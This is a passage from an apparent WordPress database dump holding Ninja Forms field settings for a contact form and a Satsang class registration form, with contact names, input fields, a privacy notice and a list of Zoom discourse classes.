Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"ESA-Initiator-Barry Frost\";s:4:\"calc\";s:1:\"-\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";s:12:\"manual_value\";b:1;}i:3;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA-Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";s:12:\"manual_value\";b:1;}}'),(18240,665,'key','select_the_person_you_would_like_to_contact_1613166666321','key','select_the_person_you_would_like_to_contact_1613166666321'),(18241,665,'container_class','one-half','container_class','one-half'),(18242,665,'drawerDisabled','','drawerDisabled',''),(18243,665,'parent_id','2','parent_id','2'),(18244,665,'field_label','Select The Person You Would Like To Contact','field_label','Select The Person You Would Like To Contact'),(18245,665,'field_key','select_the_person_you_would_like_to_contact_1613166666321','field_key','select_the_person_you_would_like_to_contact_1613166666321'),(18246,665,'idAttribute','id','idAttribute','id'),(18247,666,'objectType','Field','objectType','Field'),(18248,666,'objectDomain','fields','objectDomain','fields'),(18249,666,'editActive','','editActive',''),(18250,666,'order','8','order','8'),(18251,666,'type','textarea','type','textarea'),(18252,666,'label','Enter Your Message Here','label','Enter Your Message Here'),(18253,666,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(18254,666,'label_pos','above','label_pos','above'),(18255,666,'default_value','','default_value',''),(18256,666,'textarea_rte','0','textarea_rte','0'),(18257,666,'textarea_media','0','textarea_media','0'),(18258,666,'disable_rte_mobile','0','disable_rte_mobile','0'),(18259,666,'input_limit','','input_limit',''),(18260,666,'input_limit_type','char','input_limit_type','char'),(18261,666,'calc_auto_include','0','calc_auto_include','0'),(18262,666,'num_sort','0','num_sort','0'),(18263,666,'admin_label','','admin_label',''),(18264,666,'show_help','0','show_help','0'),(18265,666,'help_text','','help_text',''),(18266,666,'show_desc','0','show_desc','0'),(18267,666,'desc_pos','none','desc_pos','none'),(18268,666,'desc_text','','desc_text',''),(18269,666,'element_class','','element_class',''),(18270,666,'required','1','required','1'),(18271,666,'default','','default',''),(18272,666,'key','textarea_150','key','textarea_150'),(18273,666,'placeholder','','placeholder',''),(18274,666,'container_class','','container_class',''),(18275,666,'manual_key','','manual_key',''),(18276,666,'parent_id','2','parent_id','2'),(18277,666,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(18278,666,'field_key','textarea_150','field_key','textarea_150'),(18279,666,'value','','value',''),(18280,666,'idAttribute','id','idAttribute','id'),(18281,667,'objectType','Field','objectType','Field'),(18282,667,'objectDomain','fields','objectDomain','fields'),(18283,667,'editActive','','editActive',''),(18284,667,'order','10','order','10'),(18285,667,'type','submit','type','submit'),(18286,667,'label','Submit','label','Submit'),(18287,667,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(18288,667,'show_help','0','show_help','0'),(18289,667,'help_text','','help_text',''),(18290,667,'show_desc','0','show_desc','0'),(18291,667,'desc_pos','none','desc_pos','none'),(18292,667,'desc_text','','desc_text',''),(18293,667,'processing_label','Processing','processing_label','Processing'),(18294,667,'element_class','','element_class',''),(18295,667,'key','submit_152','key','submit_152'),(18296,667,'container_class','','container_class',''),(18297,667,'parent_id','2','parent_id','2'),(18298,667,'field_label','Submit','field_label','Submit'),(18299,667,'field_key','submit_152','field_key','submit_152'),(18300,667,'drawerDisabled','','drawerDisabled',''),(18301,667,'idAttribute','id','idAttribute','id'),(18302,668,'drawerDisabled','','drawerDisabled',''),(18303,668,'key','html_1663797373767','key','html_1663797373767'),(18304,668,'element_class','','element_class',''),(18305,668,'container_class','','container_class',''),(18306,668,'type','html','type','html'),(18307,668,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(18308,668,'label','HTML','label','HTML'),(18309,668,'editActive','','editActive',''),(18310,668,'order','9','order','9'),(18311,668,'idAttribute','id','idAttribute','id'),(18312,669,'element_class','','element_class',''),(18313,669,'key','html_1663797370980','key','html_1663797370980'),(18314,669,'container_class','','container_class',''),(18315,669,'default','','default',''),(18316,669,'label','HTML','label','HTML'),(18317,669,'type','html','type','html'),(18318,669,'idAttribute','id','idAttribute','id'),(18319,669,'order','11','order','11'),(18320,669,'editActive','','editActive',''),(18321,668,'field_label','HTML','field_label','HTML'),(18322,668,'field_key','html_1663797373767','field_key','html_1663797373767'),(18323,669,'field_label','HTML','field_label','HTML'),(18324,669,'field_key','html_1663797370980','field_key','html_1663797370980'),(18325,670,'parent_id','37','parent_id','37'),(18326,670,'container_class','','container_class',''),(18327,670,'element_class','','element_class',''),(18328,670,'field_label','Satsang Class Registration','field_label','Satsang Class Registration'),(18329,670,'field_key','satsang_class_registration_1632437126898','field_key','satsang_class_registration_1632437126898'),(18330,670,'key','satsang_class_registration_1632437126898','key','satsang_class_registration_1632437126898'),(18331,670,'type','html','type','html'),(18332,670,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18333,670,'default','<p style=\"font-size:18px;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>\n','default','<p style=\"font-size:18px;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>\n'),(18334,670,'order','3','order','3'),(18335,670,'editActive','','editActive',''),(18336,670,'objectDomain','fields','objectDomain','fields'),(18337,670,'objectType','Field','objectType','Field'),(18338,670,'drawerDisabled','','drawerDisabled',''),(18339,670,'label','Satsang Class Registration','label','Satsang Class Registration'),(18340,670,'idAttribute','id','idAttribute','id'),(18341,671,'editActive','','editActive',''),(18342,671,'order','2','order','2'),(18343,671,'idAttribute','id','idAttribute','id'),(18344,671,'label','Divider','label','Divider'),(18345,671,'type','hr','type','hr'),(18346,671,'container_class','','container_class',''),(18347,671,'element_class','','element_class',''),(18348,671,'key','hr_1639606449220','key','hr_1639606449220'),(18349,671,'field_label','Divider','field_label','Divider'),(18350,671,'field_key','hr_1639606449220','field_key','hr_1639606449220'),(18351,672,'element_class','','element_class',''),(18352,672,'container_class','','container_class',''),(18353,672,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18354,672,'type','hr','type','hr'),(18355,672,'key','hr_2','key','hr_2'),(18356,672,'label','Divider','label','Divider'),(18357,672,'objectType','Field','objectType','Field'),(18358,672,'objectDomain','fields','objectDomain','fields'),(18359,672,'editActive','','editActive',''),(18360,672,'order','12','order','12'),(18361,672,'field_label','Divider','field_label','Divider'),(18362,672,'field_key','hr_2','field_key','hr_2'),(18363,672,'parent_id','37','parent_id','37'),(18364,672,'idAttribute','id','idAttribute','id'),(18365,673,'objectType','Field','objectType','Field'),(18366,673,'objectDomain','fields','objectDomain','fields'),(18367,673,'editActive','','editActive',''),(18368,673,'order','13','order','13'),(18369,673,'label','HTML','label','HTML'),(18370,673,'key','html','key','html'),(18371,673,'type','html','type','html'),(18372,673,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18373,673,'default','<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>','default','<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>'),(18374,673,'container_class','','container_class',''),(18375,673,'element_class','','element_class',''),(18376,673,'field_label','HTML','field_label','HTML'),(18377,673,'field_key','html','field_key','html'),(18378,673,'drawerDisabled','','drawerDisabled',''),(18379,673,'parent_id','37','parent_id','37'),(18380,673,'idAttribute','id','idAttribute','id'),(18381,674,'editActive','','editActive',''),(18382,674,'order','11','order','11'),(18383,674,'label','Enter Message for Arahata (Optional)','label','Enter Message for Arahata (Optional)'),(18384,674,'type','textarea','type','textarea'),(18385,674,'key','enter_message_for_arahata_optional_1599679737041','key','enter_message_for_arahata_optional_1599679737041'),(18386,674,'label_pos','default','label_pos','default'),(18387,674,'required','','required',''),(18388,674,'default','','default',''),(18389,674,'placeholder','','placeholder',''),(18390,674,'container_class','','container_class',''),(18391,674,'element_class','','element_class',''),(18392,674,'input_limit','','input_limit',''),(18393,674,'input_limit_type','characters','input_limit_type','characters'),(18394,674,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(18395,674,'manual_key','','manual_key',''),(18396,674,'admin_label','','admin_label',''),(18397,674,'help_text','','help_text',''),(18398,674,'textarea_rte','','textarea_rte',''),(18399,674,'disable_rte_mobile','','disable_rte_mobile',''),(18400,674,'textarea_media','','textarea_media',''),(18401,674,'value','','value',''),(18402,674,'drawerDisabled','','drawerDisabled',''),(18403,674,'idAttribute','id','idAttribute','id'),(18404,674,'field_label','Enter Message for Arahata (Optional)','field_label','Enter Message for Arahata (Optional)'),(18405,674,'field_key','enter_message_for_arahata_optional_1599679737041','field_key','enter_message_for_arahata_optional_1599679737041'),(18406,675,'objectDomain','fields','objectDomain','fields'),(18407,675,'editActive','','editActive',''),(18408,675,'order','8','order','8'),(18409,675,'label','Divider','label','Divider'),(18410,675,'key','hr_1','key','hr_1'),(18411,675,'type','hr','type','hr'),(18412,675,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18413,675,'container_class','','container_class',''),(18414,675,'element_class','','element_class',''),(18415,675,'field_label','Divider','field_label','Divider'),(18416,675,'field_key','hr_1','field_key','hr_1'),(18417,675,'parent_id','37','parent_id','37'),(18418,675,'objectType','Field','objectType','Field'),(18419,675,'idAttribute','id','idAttribute','id'),(18420,676,'drawerDisabled','','drawerDisabled',''),(18421,676,'parent_id','37','parent_id','37'),(18422,676,'value','','value',''),(18423,676,'field_key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','field_key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498'),(18424,676,'field_label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','field_label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone'),(18425,676,'custom_mask','','custom_mask',''),(18426,676,'mask','(999) 999-9999','mask','(999) 999-9999'),(18427,676,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(18428,676,'desc_text','','desc_text',''),(18429,676,'help_text','','help_text',''),(18430,676,'admin_label','','admin_label',''),(18431,676,'objectType','Field','objectType','Field'),(18432,676,'objectDomain','fields','objectDomain','fields'),(18433,676,'editActive','','editActive',''),(18434,676,'order','7','order','7'),(18435,676,'label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone'),(18436,676,'key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498'),(18437,676,'type','textbox','type','textbox'),(18438,676,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18439,676,'label_pos','default','label_pos','default'),(18440,676,'required','1','required','1'),(18441,676,'placeholder','','placeholder',''),(18442,676,'default','','default',''),(18443,676,'container_class','one-half','container_class','one-half'),(18444,676,'element_class','','element_class',''),(18445,676,'input_limit','','input_limit',''),(18446,676,'input_limit_type','characters','input_limit_type','characters'),(18447,676,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(18448,676,'manual_key','','manual_key',''),(18449,676,'disable_input','','disable_input',''),(18450,676,'personally_identifiable','','personally_identifiable',''),(18451,676,'custom_name_attribute','','custom_name_attribute',''),(18452,676,'idAttribute','id','idAttribute','id'),(18453,677,'objectType','Field','objectType','Field'),(18454,677,'objectDomain','fields','objectDomain','fields'),(18455,677,'editActive','','editActive',''),(18456,677,'order','5','order','5'),(18457,677,'label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name'),(18458,677,'key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625'),(18459,677,'type','lastname','type','lastname'),(18460,677,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18461,677,'label_pos','default','label_pos','default'),(18462,677,'required','1','required','1'),(18463,677,'default','','default',''),(18464,677,'placeholder','','placeholder',''),(18465,677,'container_class','one-half','container_class','one-half'),(18466,677,'element_class','','element_class',''),(18467,677,'admin_label','','admin_label',''),(18468,677,'help_text','','help_text',''),(18469,677,'desc_text','','desc_text',''),(18470,677,'field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name'),(18471,677,'field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625'),(18472,677,'custom_name_attribute','lname','custom_name_attribute','lname'),(18473,677,'personally_identifiable','1','personally_identifiable','1'),(18474,677,'value','','value',''),(18475,677,'parent_id','37','parent_id','37'),(18476,677,'idAttribute','id','idAttribute','id'),(18477,677,'drawerDisabled','','drawerDisabled',''),(18478,678,'objectType','Field','objectType','Field'),(18479,678,'objectDomain','fields','objectDomain','fields'),(18480,678,'editActive','','editActive',''),(18481,678,'order','6','order','6'),(18482,678,'label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email'),(18483,678,'key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837'),(18484,678,'type','email','type','email'),(18485,678,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18486,678,'label_pos','default','label_pos','default'),(18487,678,'required','1','required','1'),(18488,678,'default','','default',''),(18489,678,'placeholder','','placeholder',''),(18490,678,'container_class','one-half first','container_class','one-half first'),(18491,678,'element_class','','element_class',''),(18492,678,'admin_label','','admin_label',''),(18493,678,'help_text','','help_text',''),(18494,678,'desc_text','','desc_text',''),(18495,678,'field_label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','field_label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email'),(18496,678,'field_key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','field_key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837'),(18497,678,'custom_name_attribute','email','custom_name_attribute','email'),(18498,678,'personally_identifiable','1','personally_identifiable','1'),(18499,678,'value','','value',''),(18500,678,'parent_id','37','parent_id','37'),(18501,678,'idAttribute','id','idAttribute','id'),(18502,678,'drawerDisabled','','drawerDisabled',''),(18503,679,'drawerDisabled','','drawerDisabled',''),(18504,679,'objectType','Field','objectType','Field'),(18505,679,'objectDomain','fields','objectDomain','fields'),(18506,679,'editActive','','editActive',''),(18507,679,'order','4','order','4'),(18508,679,'label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name'),(18509,679,'key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711'),(18510,679,'type','firstname','type','firstname'),(18511,679,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18512,679,'label_pos','default','label_pos','default'),(18513,679,'required','1','required','1'),(18514,679,'default','','default',''),(18515,679,'placeholder','','placeholder',''),(18516,679,'container_class','one-half first','container_class','one-half first'),(18517,679,'element_class','','element_class',''),(18518,679,'admin_label','','admin_label',''),(18519,679,'help_text','','help_text',''),(18520,679,'desc_text','','desc_text',''),(18521,679,'field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name'),(18522,679,'field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711'),(18523,679,'custom_name_attribute','fname','custom_name_attribute','fname'),(18524,679,'personally_identifiable','1','personally_identifiable','1'),(18525,679,'value','','value',''),(18526,679,'parent_id','37','parent_id','37'),(18527,679,'idAttribute','id','idAttribute','id'),(18528,680,'objectType','Field','objectType','Field'),(18529,680,'objectDomain','fields','objectDomain','fields'),(18530,680,'editActive','','editActive',''),(18531,680,'order','15','order','15'),(18532,680,'label','Register','label','Register'),(18533,680,'key','register','key','register'),(18534,680,'type','submit','type','submit'),(18535,680,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(18536,680,'processing_label','Processing','processing_label','Processing'),(18537,680,'container_class','','container_class',''),(18538,680,'element_class','','element_class',''),(18539,680,'field_label','Register','field_label','Register'),(18540,680,'field_key','register','field_key','register'),(18541,680,'parent_id','37','parent_id','37'),(18542,680,'idAttribute','id','idAttribute','id'),(18543,681,'editActive','','editActive',''),(18544,681,'order','10','order','10'),(18545,681,'idAttribute','id','idAttribute','id'),(18546,681,'label','Select One Class Per Registrant','label','Select One Class Per Registrant'),(18547,681,'type','listradio','type','listradio'),(18548,681,'key','select_one_class_per_registrant_1658696832524','key','select_one_class_per_registrant_1658696832524'),(18549,681,'label_pos','default','label_pos','default'),(18550,681,'required','1','required','1'),(18551,681,'options','a:17:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:78:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:78:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 645 pm -  Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 